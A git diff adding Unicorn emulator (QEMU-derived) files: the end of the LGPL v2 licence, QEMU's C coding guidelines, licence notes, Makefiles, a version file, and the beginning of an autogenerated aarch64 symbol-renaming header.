of the Library even though the source code is not. +Whether this is true is especially significant if the work can be +linked without the Library, or if the work is itself a library. The +threshold for this to be true is not precisely defined by law. + + If such an object file uses only numerical parameters, data +structure layouts and accessors, and small macros and small inline +functions (ten lines or less in length), then the use of the object +file is unrestricted, regardless of whether it is legally a derivative +work. (Executables containing this object code plus portions of the +Library will still fall under Section 6.) + + Otherwise, if the work is a derivative of the Library, you may +distribute the object code for the work under the terms of Section 6. +Any executables containing that work also fall under Section 6, +whether or not they are linked directly with the Library itself. + + 6. As an exception to the Sections above, you may also combine or +link a "work that uses the Library" with the Library to produce a +work containing portions of the Library, and distribute that work +under terms of your choice, provided that the terms permit +modification of the work for the customer's own use and reverse +engineering for debugging such modifications. + + You must give prominent notice with each copy of the work that the +Library is used in it and that the Library and its use are covered by +this License. You must supply a copy of this License. If the work +during execution displays copyright notices, you must include the +copyright notice for the Library among them, as well as a reference +directing the user to the copy of this License. Also, you must do one +of these things: + + a) Accompany the work with the complete corresponding + machine-readable source code for the Library including whatever + changes were used in the work (which must be distributed under + Sections 1 and 2 above); and, if the work is an executable linked + with the Library, with the complete machine-readable "work that + uses the Library", as object code and/or source code, so that the + user can modify the Library and then relink to produce a modified + executable containing the modified Library. (It is understood + that the user who changes the contents of definitions files in the + Library will not necessarily be able to recompile the application + to use the modified definitions.) + + b) Use a suitable shared library mechanism for linking with the + Library. A suitable mechanism is one that (1) uses at run time a + copy of the library already present on the user's computer system, + rather than copying library functions into the executable, and (2) + will operate properly with a modified version of the library, if + the user installs one, as long as the modified version is + interface-compatible with the version that the work was made with. + + c) Accompany the work with a written offer, valid for at + least three years, to give the same user the materials + specified in Subsection 6a, above, for a charge no more + than the cost of performing this distribution. + + d) If distribution of the work is made by offering access to copy + from a designated place, offer equivalent access to copy the above + specified materials from the same place. + + e) Verify that the user has already received a copy of these + materials or that you have already sent this user a copy. + + For an executable, the required form of the "work that uses the +Library" must include any data and utility programs needed for +reproducing the executable from it. However, as a special exception, +the materials to be distributed need not include anything that is +normally distributed (in either source or binary form) with the major +components (compiler, kernel, and so on) of the operating system on +which the executable runs, unless that component itself accompanies +the executable. + + It may happen that this requirement contradicts the license +restrictions of other proprietary libraries that do not normally +accompany the operating system. Such a contradiction means you cannot +use both them and the Library together in an executable that you +distribute. + + 7. You may place library facilities that are a work based on the +Library side-by-side in a single library together with other library +facilities not covered by this License, and distribute such a combined +library, provided that the separate distribution of the work based on +the Library and of the other library facilities is otherwise +permitted, and provided that you do these two things: + + a) Accompany the combined library with a copy of the same work + based on the Library, uncombined with any other library + facilities. This must be distributed under the terms of the + Sections above. + + b) Give prominent notice with the combined library of the fact + that part of it is a work based on the Library, and explaining + where to find the accompanying uncombined form of the same work. + + 8. You may not copy, modify, sublicense, link with, or distribute +the Library except as expressly provided under this License. Any +attempt otherwise to copy, modify, sublicense, link with, or +distribute the Library is void, and will automatically terminate your +rights under this License. However, parties who have received copies, +or rights, from you under this License will not have their licenses +terminated so long as such parties remain in full compliance. + + 9. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Library or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Library (or any work based on the +Library), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Library or works based on it. + + 10. Each time you redistribute the Library (or any work based on the +Library), the recipient automatically receives a license from the +original licensor to copy, distribute, link with or modify the Library +subject to these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties with +this License. + + 11. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Library at all. For example, if a patent +license would not permit royalty-free redistribution of the Library by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Library. + +If any portion of this section is held invalid or unenforceable under any +particular circumstance, the balance of the section is intended to apply, +and the section as a whole is intended to apply in other circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 12. If the distribution and/or use of the Library is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Library under this License may add +an explicit geographical distribution limitation excluding those countries, +so that distribution is permitted only in or among countries not thus +excluded. In such case, this License incorporates the limitation as if +written in the body of this License. + + 13. The Free Software Foundation may publish revised and/or new +versions of the Lesser General Public License from time to time. +Such new versions will be similar in spirit to the present version, +but may differ in detail to address new problems or concerns. + +Each version is given a distinguishing version number. If the Library +specifies a version number of this License which applies to it and +"any later version", you have the option of following the terms and +conditions either of that version or of any later version published by +the Free Software Foundation. If the Library does not specify a +license version number, you may choose any version ever published by +the Free Software Foundation. + + 14. If you wish to incorporate parts of the Library into other free +programs whose distribution conditions are incompatible with these, +write to the author to ask for permission. For software which is +copyrighted by the Free Software Foundation, write to the Free +Software Foundation; we sometimes make exceptions for this. Our +decision will be guided by the two goals of preserving the free status +of all derivatives of our free software and of promoting the sharing +and reuse of software generally. + + NO WARRANTY + + 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO +WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. +EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR +OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY +KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE +LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME +THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN +WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY +AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU +FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR +CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE +LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING +RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A +FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF +SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH +DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Libraries + + If you develop a new library, and you want it to be of the greatest +possible use to the public, we recommend making it free software that +everyone can redistribute and change. You can do so by permitting +redistribution under these terms (or, alternatively, under the terms of the +ordinary General Public License). + + To apply these terms, attach the following notices to the library. It is +safest to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least the +"copyright" line and a pointer to where the full notice is found. + + <one line to give the library's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Lesser General Public + License as published by the Free Software Foundation; either + version 2 of the License, or (at your option) any later version. + + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Lesser General Public License for more details. + + You should have received a copy of the GNU Lesser General Public + License along with this library; if not, write to the Free Software + Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA + +Also add information on how to contact you by electronic and paper mail. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the library, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the + library `Frob' (a library for tweaking knobs) written by James Random Hacker. + + <signature of Ty Coon>, 1 April 1990 + Ty Coon, President of Vice + +That's all there is to it! + + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/HACKING b/ai_anti_malware/unicorn/unicorn-master/qemu/HACKING new file mode 100644 index 0000000..12fbc8a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/HACKING @@ -0,0 +1,159 @@ +1. Preprocessor + +For variadic macros, stick with this C99-like syntax: + +#define DPRINTF(fmt, ...) \ + do { printf("IRQ: " fmt, ## __VA_ARGS__); } while (0) + +2. C types + +It should be common sense to use the right type, but we have collected +a few useful guidelines here. + +2.1. Scalars + +If you're using "int" or "long", odds are good that there's a better type. +If a variable is counting something, it should be declared with an +unsigned type. + +If it's host memory-size related, size_t should be a good choice (use +ssize_t only if required). Guest RAM memory offsets must use ram_addr_t, +but only for RAM, it may not cover whole guest address space. + +If it's file-size related, use off_t. +If it's file-offset related (i.e., signed), use off_t. +If it's just counting small numbers use "unsigned int"; +(on all but oddball embedded systems, you can assume that that +type is at least four bytes wide). + +In the event that you require a specific width, use a standard type +like int32_t, uint32_t, uint64_t, etc. The specific types are +mandatory for VMState fields. + +Don't use Linux kernel internal types like u32, __u32 or __le32. + +Use hwaddr for guest physical addresses except pcibus_t +for PCI addresses. In addition, ram_addr_t is a QEMU internal address +space that maps guest RAM physical addresses into an intermediate +address space that can map to host virtual address spaces. Generally +speaking, the size of guest memory can always fit into ram_addr_t but +it would not be correct to store an actual guest physical address in a +ram_addr_t. + +For CPU virtual addresses there are several possible types. +vaddr is the best type to use to hold a CPU virtual address in +target-independent code. It is guaranteed to be large enough to hold a +virtual address for any target, and it does not change size from target +to target. It is always unsigned. +target_ulong is a type the size of a virtual address on the CPU; this means +it may be 32 or 64 bits depending on which target is being built. It should +therefore be used only in target-specific code, and in some +performance-critical built-per-target core code such as the TLB code. +There is also a signed version, target_long. +abi_ulong is for the *-user targets, and represents a type the size of +'void *' in that target's ABI. (This may not be the same as the size of a +full CPU virtual address in the case of target ABIs which use 32 bit pointers +on 64 bit CPUs, like sparc32plus.) Definitions of structures that must match +the target's ABI must use this type for anything that on the target is defined +to be an 'unsigned long' or a pointer type. +There is also a signed version, abi_long. + +Of course, take all of the above with a grain of salt. If you're about +to use some system interface that requires a type like size_t, pid_t or +off_t, use matching types for any corresponding variables. + +Also, if you try to use e.g., "unsigned int" as a type, and that +conflicts with the signedness of a related variable, sometimes +it's best just to use the *wrong* type, if "pulling the thread" +and fixing all related variables would be too invasive. + +Finally, while using descriptive types is important, be careful not to +go overboard. If whatever you're doing causes warnings, or requires +casts, then reconsider or ask for help. + +2.2. Pointers + +Ensure that all of your pointers are "const-correct". +Unless a pointer is used to modify the pointed-to storage, +give it the "const" attribute. That way, the reader knows +up-front that this is a read-only pointer. Perhaps more +importantly, if we're diligent about this, when you see a non-const +pointer, you're guaranteed that it is used to modify the storage +it points to, or it is aliased to another pointer that is. + +2.3. Typedefs +Typedefs are used to eliminate the redundant 'struct' keyword. + +2.4. Reserved namespaces in C and POSIX +Underscore capital, double underscore, and underscore 't' suffixes should be +avoided. + +3. Low level memory management + +Use of the malloc/free/realloc/calloc/valloc/memalign/posix_memalign +APIs is not allowed in the QEMU codebase. Instead of these routines, +use the GLib memory allocation routines g_malloc/g_malloc0/g_new/ +g_new0/g_realloc/g_free or QEMU's qemu_memalign/qemu_blockalign/qemu_vfree +APIs. + +Please note that g_malloc will exit on allocation failure, so there +is no need to test for failure (as you would have to with malloc). +Calling g_malloc with a zero size is valid and will return NULL. + +Memory allocated by qemu_memalign or qemu_blockalign must be freed with +qemu_vfree, since breaking this will cause problems on Win32. + +4. String manipulation + +Do not use the strncpy function. As mentioned in the man page, it does *not* +guarantee a NULL-terminated buffer, which makes it extremely dangerous to use. +It also zeros trailing destination bytes out to the specified length. Instead, +use this similar function when possible, but note its different signature: +void pstrcpy(char *dest, int dest_buf_size, const char *src) + +Don't use strcat because it can't check for buffer overflows, but: +char *pstrcat(char *buf, int buf_size, const char *s) + +The same limitation exists with sprintf and vsprintf, so use snprintf and +vsnprintf. + +QEMU provides other useful string functions: +int strstart(const char *str, const char *val, const char **ptr) +int stristart(const char *str, const char *val, const char **ptr) +int qemu_strnlen(const char *s, int max_len) + +There are also replacement character processing macros for isxyz and toxyz, +so instead of e.g. isalnum you should use qemu_isalnum. + +Because of the memory management rules, you must use g_strdup/g_strndup +instead of plain strdup/strndup. + +5. Printf-style functions + +Whenever you add a new printf-style function, i.e., one with a format +string argument and following "..." in its prototype, be sure to use +gcc's printf attribute directive in the prototype. + +This makes it so gcc's -Wformat and -Wformat-security options can do +their jobs and cross-check format strings with the number and types +of arguments. + +6. C standard, implementation defined and undefined behaviors + +C code in QEMU should be written to the C99 language specification. A copy +of the final version of the C99 standard with corrigenda TC1, TC2, and TC3 +included, formatted as a draft, can be downloaded from: + http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf + +The C language specification defines regions of undefined behavior and +implementation defined behavior (to give compiler authors enough leeway to +produce better code). In general, code in QEMU should follow the language +specification and avoid both undefined and implementation defined +constructs. ("It works fine on the gcc I tested it with" is not a valid +argument...) However there are a few areas where we allow ourselves to +assume certain behaviors because in practice all the platforms we care about +behave in the same way and writing strictly conformant code would be +painful. These are: + * you may assume that integers are 2s complement representation + * you may assume that right shift of a signed integer duplicates + the sign bit (ie it is an arithmetic shift, not a logical shift) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/LICENSE b/ai_anti_malware/unicorn/unicorn-master/qemu/LICENSE new file mode 100644 index 0000000..da70e94 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/LICENSE @@ -0,0 +1,21 @@ +The following points clarify the QEMU license: + +1) QEMU as a whole is released under the GNU General Public License, +version 2. + +2) Parts of QEMU have specific licenses which are compatible with the +GNU General Public License, version 2. Hence each source file contains +its own licensing information. Source files with no licensing information +are released under the GNU General Public License, version 2 or (at your +option) any later version. + +As of July 2013, contributions under version 2 of the GNU General Public +License (and no later version) are only accepted for the following files +or directories: bsd-user/, linux-user/, hw/misc/vfio.c, hw/xen/xen_pt*. + +3) The Tiny Code Generator (TCG) is released under the BSD license + (see license headers in files). + +4) QEMU is a trademark of Fabrice Bellard. + +Fabrice Bellard and the QEMU team diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile b/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile new file mode 100644 index 0000000..8e5762e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile @@ -0,0 +1,115 @@ +# Makefile for QEMU - modified for Unicorn engine. + +# Always point to the root of the build tree (needs GNU make). +BUILD_DIR=$(CURDIR) + +# All following code might depend on configuration variables +ifneq ($(wildcard config-host.mak),) +# Put the all: rule here so that config-host.mak can contain dependencies. +all: +include config-host.mak + +# Check that we're not trying to do an out-of-tree build from +# a tree that's been used for an in-tree build. +ifneq ($(realpath $(SRC_PATH)),$(realpath .)) +ifneq ($(wildcard $(SRC_PATH)/config-host.mak),) +$(error This is an out of tree build but your source tree ($(SRC_PATH)) \ +seems to have been used for an in-tree build. You can fix this by running \ +"make distclean && rm -rf *-linux-user *-softmmu" in your source tree) +endif +endif + +CONFIG_SOFTMMU := $(if $(filter %-softmmu,$(TARGET_DIRS)),y) +-include config-all-devices.mak + +include $(SRC_PATH)/rules.mak +config-host.mak: $(SRC_PATH)/configure + @echo $@ is out-of-date, running configure +else +config-host.mak: +ifneq ($(filter-out %clean,$(MAKECMDGOALS)),$(if $(MAKECMDGOALS),,fail)) + @echo "Please call configure before running make!" + @exit 1 +endif +endif + +GENERATED_HEADERS = config-host.h + +# Don't try to regenerate Makefile or configure +# We don't generate any of them +Makefile: ; +configure: ; + +.PHONY: all clean distclean recurse-all + +$(call set-vpath, $(SRC_PATH)) + +SUBDIR_MAKEFLAGS=$(if $(V),,--no-print-directory) BUILD_DIR=$(BUILD_DIR) +SUBDIR_DEVICES_MAK=$(patsubst %, %/config-devices.mak, $(TARGET_DIRS)) +SUBDIR_DEVICES_MAK_DEP=$(patsubst %, %-config-devices.mak.d, $(TARGET_DIRS)) + +ifeq ($(SUBDIR_DEVICES_MAK),) +config-all-devices.mak: + $(call quiet-command,echo '# no devices' > $@," GEN $@") +else +config-all-devices.mak: $(SUBDIR_DEVICES_MAK) + $(call quiet-command, sed -n \ + 's|^\([^=]*\)=\(.*\)$$|\1:=$$(findstring y,$$(\1)\2)|p' \ + $(SUBDIR_DEVICES_MAK) | sort -u > $@, \ + " GEN $@") +endif + +-include $(SUBDIR_DEVICES_MAK_DEP) + +%/config-devices.mak: default-configs/%.mak + $(call quiet-command, cp $< $@, " GEN $@") + +ifneq ($(wildcard config-host.mak),) +include $(SRC_PATH)/Makefile.objs +endif + +dummy := $(call unnest-vars,,util-obj-y common-obj-y) + +all: recurse-all + +config-host.h: config-host.h-timestamp +config-host.h-timestamp: config-host.mak + +SUBDIR_RULES=$(patsubst %,subdir-%, $(TARGET_DIRS)) +SOFTMMU_SUBDIR_RULES=$(filter %-softmmu,$(SUBDIR_RULES)) + +$(SOFTMMU_SUBDIR_RULES): config-all-devices.mak + +subdir-%: + $(call quiet-command,$(MAKE) $(SUBDIR_MAKEFLAGS) -C $* V="$(V)" TARGET_DIR="$*/" all,) + +$(SUBDIR_RULES): qapi-types.c qapi-types.h qapi-visit.c qapi-visit.h $(common-obj-y) $(util-obj-y) + +recurse-all: $(SUBDIR_RULES) + +###################################################################### + +clean: + find . \( -name '*.l[oa]' -o -name '*.so' -o -name '*.dll' -o -name '*.mo' -o -name '*.[oda]' \) -type f -exec rm {} + + rm -f TAGS *~ */*~ + @# May not be present in GENERATED_HEADERS + rm -f $(foreach f,$(GENERATED_HEADERS),$(f) $(f)-timestamp) + for d in $(TARGET_DIRS); do \ + if test -d $$d; then $(MAKE) -C $$d $@ || exit 1; fi; \ + done + +distclean: clean + rm -f config-host.mak config-host.h* + rm -f config-all-devices.mak + rm -f config.log config.status + for d in $(TARGET_DIRS); do \ + rm -rf $$d || exit 1 ; \ + done + + +# Add a dependency on the generated files, so that they are always +# rebuilt before other object files +ifneq ($(filter-out %clean,$(MAKECMDGOALS)),$(if $(MAKECMDGOALS),,fail)) +Makefile: $(GENERATED_HEADERS) +endif + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile.objs new file mode 100644 index 0000000..fcf5f30 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile.objs @@ -0,0 +1,12 @@ +####################################################################### +# Common libraries for tools and emulators +util-obj-y = util/ qobject/ qapi/ qapi-types.o qapi-visit.o + +common-obj-y += hw/ +common-obj-y += accel.o +common-obj-y += vl.o qemu-timer.o +common-obj-y += ../uc.o ../list.o glib_compat.o +common-obj-y += qemu-log.o +common-obj-y += tcg-runtime.o +common-obj-y += hw/ +common-obj-y += qom/ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile.target b/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile.target new file mode 100644 index 0000000..356ce1c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/Makefile.target @@ -0,0 +1,84 @@ +# -*- Mode: makefile -*- + +include ../config-host.mak +include config-target.mak +include config-devices.mak +include $(SRC_PATH)/rules.mak + +$(call set-vpath, $(SRC_PATH)) +QEMU_CFLAGS += -I.. -I$(SRC_PATH)/target-$(TARGET_BASE_ARCH) -DNEED_CPU_H + +QEMU_CFLAGS+=-I$(SRC_PATH)/include + +# system emulator name +QEMU_PROG=qemu-system-$(TARGET_NAME)$(EXESUF) + +config-target.h: config-target.h-timestamp +config-target.h-timestamp: config-target.mak + +all: $(QEMU_PROG) + +######################################################### +# cpu emulator library +obj-y = exec.o translate-all.o cpu-exec.o +obj-y += tcg/tcg.o tcg/optimize.o +obj-y += fpu/softfloat.o +obj-y += target-$(TARGET_BASE_ARCH)/ + +######################################################### +# System emulator target +obj-y += cpus.o ioport.o +obj-y += hw/ +obj-y += memory.o cputlb.o +obj-y += memory_mapping.o + +# Hardware support +ifeq ($(TARGET_NAME), sparc64) +obj-y += hw/sparc64/ +else +obj-y += hw/$(TARGET_BASE_ARCH)/ +endif + +# Workaround for http://gcc.gnu.org/PR55489, see configure. +%/translate.o: QEMU_CFLAGS += $(TRANSLATE_OPT_CFLAGS) + +dummy := $(call unnest-vars,,obj-y) +all-obj-y := $(obj-y) + +common-obj-y := +include $(SRC_PATH)/Makefile.objs + +dummy := $(call unnest-vars,..,util-obj-y) + +target-obj-y-save := $(target-obj-y) $(util-obj-y) + +dummy := $(call unnest-vars,..,common-obj-y) + +target-obj-y := $(target-obj-y-save) +all-obj-y += $(common-obj-y) +all-obj-y += $(target-obj-y) + +# determine shared lib extension +IS_APPLE := $(shell $(CC) -dM -E - < /dev/null | grep __apple_build_version__ | wc -l | tr -d " ") +ifeq ($(IS_APPLE),1) +EXT = dylib +else +# Cygwin? +IS_CYGWIN := $(shell $(CC) -dumpmachine | grep -i cygwin | wc -l) +ifeq ($(IS_CYGWIN),1) +EXT = dll +else +EXT = so +endif +endif + +# build either PROG or PROGW +$(QEMU_PROG): $(all-obj-y) + +clean: + rm -f *.a *~ $(QEMU_PROG) + rm -f $(shell find . -name '*.[od]') + +GENERATED_HEADERS += config-target.h +Makefile: $(GENERATED_HEADERS) + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/VERSION b/ai_anti_malware/unicorn/unicorn-master/qemu/VERSION new file mode 100644 index 0000000..c043eea --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/VERSION @@ -0,0 +1 @@ +2.2.1 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/aarch64.h b/ai_anti_malware/unicorn/unicorn-master/qemu/aarch64.h new file mode 100644 index 0000000..470a62d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/aarch64.h @@ -0,0 +1,3056 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_AARCH64_H +#define UNICORN_AUTOGEN_AARCH64_H +#define arm_release arm_release_aarch64 +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_aarch64 +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_aarch64 +#define use_idiv_instructions_rt use_idiv_instructions_rt_aarch64 +#define tcg_target_deposit_valid tcg_target_deposit_valid_aarch64 +#define helper_power_down helper_power_down_aarch64 +#define check_exit_request check_exit_request_aarch64 +#define address_space_unregister address_space_unregister_aarch64 +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_aarch64 +#define phys_mem_clean phys_mem_clean_aarch64 +#define tb_cleanup tb_cleanup_aarch64 +#define memory_map memory_map_aarch64 +#define memory_map_ptr memory_map_ptr_aarch64 +#define memory_unmap memory_unmap_aarch64 +#define memory_free memory_free_aarch64 +#define free_code_gen_buffer free_code_gen_buffer_aarch64 +#define helper_raise_exception helper_raise_exception_aarch64 +#define tcg_enabled tcg_enabled_aarch64 +#define tcg_exec_init tcg_exec_init_aarch64 +#define memory_register_types memory_register_types_aarch64 +#define cpu_exec_init_all cpu_exec_init_all_aarch64 +#define vm_start vm_start_aarch64 +#define resume_all_vcpus resume_all_vcpus_aarch64 +#define a15_l2ctlr_read a15_l2ctlr_read_aarch64 +#define a64_translate_init a64_translate_init_aarch64 +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_aarch64 +#define aa64_cacheop_access aa64_cacheop_access_aarch64 +#define aa64_daif_access aa64_daif_access_aarch64 +#define aa64_daif_write aa64_daif_write_aarch64 +#define aa64_dczid_read aa64_dczid_read_aarch64 +#define aa64_fpcr_read aa64_fpcr_read_aarch64 +#define aa64_fpcr_write aa64_fpcr_write_aarch64 +#define aa64_fpsr_read aa64_fpsr_read_aarch64 +#define aa64_fpsr_write aa64_fpsr_write_aarch64 +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_aarch64 +#define aa64_zva_access aa64_zva_access_aarch64 +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_aarch64 +#define aarch64_restore_sp aarch64_restore_sp_aarch64 +#define aarch64_save_sp aarch64_save_sp_aarch64 +#define accel_find accel_find_aarch64 +#define accel_init_machine accel_init_machine_aarch64 +#define accel_type accel_type_aarch64 +#define access_with_adjusted_size access_with_adjusted_size_aarch64 +#define add128 add128_aarch64 +#define add16_sat add16_sat_aarch64 +#define add16_usat add16_usat_aarch64 +#define add192 add192_aarch64 +#define add8_sat add8_sat_aarch64 +#define add8_usat add8_usat_aarch64 +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_aarch64 +#define add_cpreg_to_list add_cpreg_to_list_aarch64 +#define addFloat128Sigs addFloat128Sigs_aarch64 +#define addFloat32Sigs addFloat32Sigs_aarch64 +#define addFloat64Sigs addFloat64Sigs_aarch64 +#define addFloatx80Sigs addFloatx80Sigs_aarch64 +#define add_qemu_ldst_label add_qemu_ldst_label_aarch64 +#define address_space_access_valid address_space_access_valid_aarch64 +#define address_space_destroy address_space_destroy_aarch64 +#define address_space_destroy_dispatch address_space_destroy_dispatch_aarch64 +#define address_space_get_flatview address_space_get_flatview_aarch64 +#define address_space_init address_space_init_aarch64 +#define address_space_init_dispatch address_space_init_dispatch_aarch64 +#define address_space_lookup_region address_space_lookup_region_aarch64 +#define address_space_map address_space_map_aarch64 +#define address_space_read address_space_read_aarch64 +#define address_space_rw address_space_rw_aarch64 +#define address_space_translate address_space_translate_aarch64 +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_aarch64 +#define address_space_translate_internal address_space_translate_internal_aarch64 +#define address_space_unmap address_space_unmap_aarch64 +#define address_space_update_topology address_space_update_topology_aarch64 +#define address_space_update_topology_pass address_space_update_topology_pass_aarch64 +#define address_space_write address_space_write_aarch64 +#define addrrange_contains addrrange_contains_aarch64 +#define addrrange_end addrrange_end_aarch64 +#define addrrange_equal addrrange_equal_aarch64 +#define addrrange_intersection addrrange_intersection_aarch64 +#define addrrange_intersects addrrange_intersects_aarch64 +#define addrrange_make addrrange_make_aarch64 +#define adjust_endianness adjust_endianness_aarch64 +#define all_helpers all_helpers_aarch64 +#define alloc_code_gen_buffer alloc_code_gen_buffer_aarch64 +#define alloc_entry alloc_entry_aarch64 +#define always_true always_true_aarch64 +#define arm1026_initfn arm1026_initfn_aarch64 +#define arm1136_initfn arm1136_initfn_aarch64 +#define arm1136_r2_initfn arm1136_r2_initfn_aarch64 +#define arm1176_initfn arm1176_initfn_aarch64 +#define arm11mpcore_initfn arm11mpcore_initfn_aarch64 +#define arm926_initfn arm926_initfn_aarch64 +#define arm946_initfn arm946_initfn_aarch64 +#define arm_ccnt_enabled arm_ccnt_enabled_aarch64 +#define arm_cp_read_zero arm_cp_read_zero_aarch64 +#define arm_cp_reset_ignore arm_cp_reset_ignore_aarch64 +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_aarch64 +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_aarch64 +#define arm_cpu_finalizefn arm_cpu_finalizefn_aarch64 +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_aarch64 +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_aarch64 +#define arm_cpu_initfn arm_cpu_initfn_aarch64 +#define arm_cpu_list arm_cpu_list_aarch64 +#define cpu_loop_exit cpu_loop_exit_aarch64 +#define arm_cpu_post_init arm_cpu_post_init_aarch64 +#define arm_cpu_realizefn arm_cpu_realizefn_aarch64 +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_aarch64 +#define arm_cpu_register_types arm_cpu_register_types_aarch64 +#define cpu_resume_from_signal cpu_resume_from_signal_aarch64 +#define arm_cpus arm_cpus_aarch64 +#define arm_cpu_set_pc arm_cpu_set_pc_aarch64 +#define arm_cp_write_ignore arm_cp_write_ignore_aarch64 +#define arm_current_el arm_current_el_aarch64 +#define arm_dc_feature arm_dc_feature_aarch64 +#define arm_debug_excp_handler arm_debug_excp_handler_aarch64 +#define arm_debug_target_el arm_debug_target_el_aarch64 +#define arm_el_is_aa64 arm_el_is_aa64_aarch64 +#define arm_env_get_cpu arm_env_get_cpu_aarch64 +#define arm_excp_target_el arm_excp_target_el_aarch64 +#define arm_excp_unmasked arm_excp_unmasked_aarch64 +#define arm_feature arm_feature_aarch64 +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_aarch64 +#define gen_intermediate_code gen_intermediate_code_aarch64 +#define gen_intermediate_code_pc gen_intermediate_code_pc_aarch64 +#define arm_gen_test_cc arm_gen_test_cc_aarch64 +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_aarch64 +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_aarch64 +#define arm_handle_psci_call arm_handle_psci_call_aarch64 +#define arm_is_psci_call arm_is_psci_call_aarch64 +#define arm_is_secure arm_is_secure_aarch64 +#define arm_is_secure_below_el3 arm_is_secure_below_el3_aarch64 +#define arm_ldl_code arm_ldl_code_aarch64 +#define arm_lduw_code arm_lduw_code_aarch64 +#define arm_log_exception arm_log_exception_aarch64 +#define arm_reg_read arm_reg_read_aarch64 +#define arm_reg_reset arm_reg_reset_aarch64 +#define arm_reg_write arm_reg_write_aarch64 +#define 